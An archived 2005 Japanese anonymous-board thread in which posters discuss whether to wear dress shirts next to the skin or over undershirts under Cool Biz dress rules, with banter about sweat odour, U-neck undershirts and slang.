この2〜3年、夜、遊びに出る時は、スカーフ巻いてる。
これがホステスのオネエチャン達からは大好評である。
奉先、おまえもスカーフ捲け。
それがサマになるようになったらおまえも一丁前だ。



190 :名無しさん@お腹いっぱい。:2005/06/17(金) 18:38:15
うちの会社、クール・ビズ始まることになったんだけど、
俺ワイシャツの下Tシャツ派だからさ、ネクタイ取ると
Tシャツ見えちゃうんだよね。
かといって長年の習慣で素肌には気持ち悪くて着れないし。
なんか良いアイデアありませんか?

191 :名無しさん@お腹いっぱい。:2005/06/17(金) 18:41:28
Uシャツがあるでしょ

192 :名無しさん@お腹いっぱい。:2005/06/17(金) 18:45:30
ノーネクタイ導入してるとこは、みんなそうしてるのかな?
それとも素肌派が大多数?

193 :名無しさん@お腹いっぱい。:2005/06/17(金) 18:47:42
あっ191は冗談よ、まさか本気に…

194 :名無しさん@お腹いっぱい。:2005/06/17(金) 18:57:32
マジレス、Uシャツ着るくらいならTシャツが良い。
首回りが伸びきった下着のイメージで着るのは無しで。

195 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:00:42
あ、深く考えずにそいうのがあるのかと思た。
クビのところが深くUになってるようなヤツ・・・

んー、じゃホントにどうしてるのだろう。


196 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:03:32
Uシャツぐぐっちゃったよ
逝ってきます・・・orz


197 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:07:15
>>194
ガイドラインとして胸元から下着見えるのはNGなんだよね。。。

198 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:07:53
>>195
あるよ、Uシャツ。
でも、ステキな40代とはほど遠いおじさんとかステテコ履いたおじいさんのイメージ。

199 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:11:21
>>198
あ、そいうことか。
なんか俺だけ知らない特異なシャツが存在するのかと思った。
Uシャツっていうの知らなかったよ・・・

200 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:11:54
200!

201 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:37:56
今ぐぐってみたんだけど、それ用の下着って結構あるみたいね。
そりゃそうだよな。
下着メーカーにしてみればビジネスチャンスだもんな。


202 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:38:58
汗臭いよお

203 :名無しさん@お腹いっぱい。:2005/06/17(金) 21:28:35
くっさー
何で?

204 :名無しさん@お腹いっぱい。:2005/06/17(金) 22:55:06
シャツの下はタンクトップでいいんじゃネェの?

俺は汗かきだからして、
職場に着いたら下に着ていたタンクトップを脱いで、
素肌にシャツを着ることが多い。
そんでもってだねぇ、グレーとかベージュとかだと意外と目立たないぞ〜〜

あんまり汗かかない涼しい日は、下着もそのまま。


205 :名無しさん@お腹いっぱい。:2005/06/18(土) 05:44:50

0歳から14歳の人口:年少人口
15歳から64歳までの人口:生産年齢人口
65歳以上の人口:老年人口


206 :名無しさん@お腹いっぱい。:2005/06/18(土) 11:19:24
若い人にはいいかもね。でもオサーンがすると加歳臭がするよ。

207 :名無しさん@お腹いっぱい。:2005/06/18(土) 11:34:46
>>206
そうかな?

208 :名無しさん@お腹いっぱい。:2005/06/18(土) 11:37:42
うん。 そうだよ。特に45歳以上はNG。

209 :名無しさん@お腹いっぱい。:2005/06/18(土) 11:39:40
>>208
そうかな? 勝手に決めるなよ 若くたって臭う奴は居るんだぞ

210 :名無しさん@お腹いっぱい。:2005/06/18(土) 17:08:53
てことは素肌にワイシャツは臭うからダメって結論でオケ?

211 :名無しさん@お腹いっぱい。:2005/06/18(土) 18:12:39
>>190
Tシャツは絶対見えるよ。アイデアなんぞあるわけない。なにいってんだ?

どうしても、つーなら、ボタンダウンで昔のVANのようにTシャツを見せるスタイルか、
マオカラー、スタンドカラーにして上までボタンを留める。




212 :名無しさん@お腹いっぱい。:2005/06/18(土) 19:38:41
このスレ、定期的にもちあがるけど
ウホッのすれでしょ。

213 :名無しさん@お腹いっぱい。:2005/06/18(土) 19:41:31
>>212
なぜ、そう思うんだ?


214 :名無しさん@お腹いっぱい。:2005/06/18(土) 23:15:51
透けるビーチクがいやらしかっこいい。

215 :名無しさん@お腹いっぱい。:2005/06/19(日) 00:19:10
>>212
>ウホッのすれでしょ。
ゴメン、「ウホッ」って何だ?


216 :名無しさん@お腹いっぱい。:2005/06/19(日) 00:24:50
二枚目の(チョッと古い言い回しだね)リーマンの素肌ワイシャツに遭遇すると、必ず全身チェックします。
俺って何なんだろう。

217 :名無しさん@お腹いっぱい。:2005/06/19(日) 00:26:14
ホモでつか?

218 :216:2005/06/19(日) 00:27:53
嫌だわぁねぇ。
ホモじゃないわよ。俺って。

219 :名無しさん@お腹いっぱい。:2005/06/19(日) 00:37:34
「ウホッ」っていつ頃はやったの? 漏れ、40代前半だけど聞いた事無いよ。

220 :名無しさん@お腹いっぱい。:2005/06/19(日) 12:15:51
ウホッ!

221 :名無しさん@お腹いっぱい。:2005/06/19(日) 12:16:44
ウホッホ探検隊! っていう映画があったな。
田中邦衛が格好いい役で出てくる

222 :名無しさん@お腹いっぱい。:2005/06/19(日) 15:20:50
素肌じゃないと、男らしくないわ。

223 :名無しさん@お腹いっぱい。:2005/06/19(日) 15:52:41
白いワイシャツの下にいつもU字型の下着が見えてます。
ダサいのね。

224 :名無しさん@お腹いっぱい。:2005/06/19(日) 15:53:29
>>223
素肌に着なさいよね。ダサイ糞オヤジ!

225 :名無しさん@お腹いっぱい。:2005/06/19(日) 17:20:17
素肌で汗臭い人と下着着て汗臭くない人とどちらがいいですか?

226 :名無しさん@お腹いっぱい。:2005/06/19(日) 17:26:27
汗臭いのやワキガは何を着ててもダメ!

227 :名無しさん@お腹いっぱい。:2005/06/19(日) 17:26:56
素肌で汗臭くなくそこはかとコロンが香りかつそれが似合う人、がいいです。

228 :名無しさん@お腹いっぱい。:2005/06/19(日) 17:39:18
「COOL BZ」の影響で素肌にワイシャツ派って増えるかなぁ…?

229 :名無しさん@お腹いっぱい。:2005/06/19(日) 17:39:32
多少、汗臭くっても私は素肌に着た親父を選ぶな。


230 :名無しさん@お腹いっぱい。:2005/06/19(日) 17:57:43
乳首が見えないワイシャツ売ってますか?

231 :名無しさん@お腹いっぱい。:2005/06/19(日) 19:46:25
212です。
うほっ!って
2ちゃんねるで知りました。
なんかホモマンガで使われていた言葉で
いつのまにか、うほっ!=ホモ、って
ことだと理解してました。
それほど本来の意味とは遠くないと思っています。

232 :名無しさん@お腹いっぱい。:2005/06/19(日) 20:00:58
>>230
普通のシャツは乳首なんて見えないよ。
安物はダメだけど。

233 :名無しさん@お腹いっぱい。:2005/06/19(日) 21:17:57
>232
ありがと、もう少し高い物買います。

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)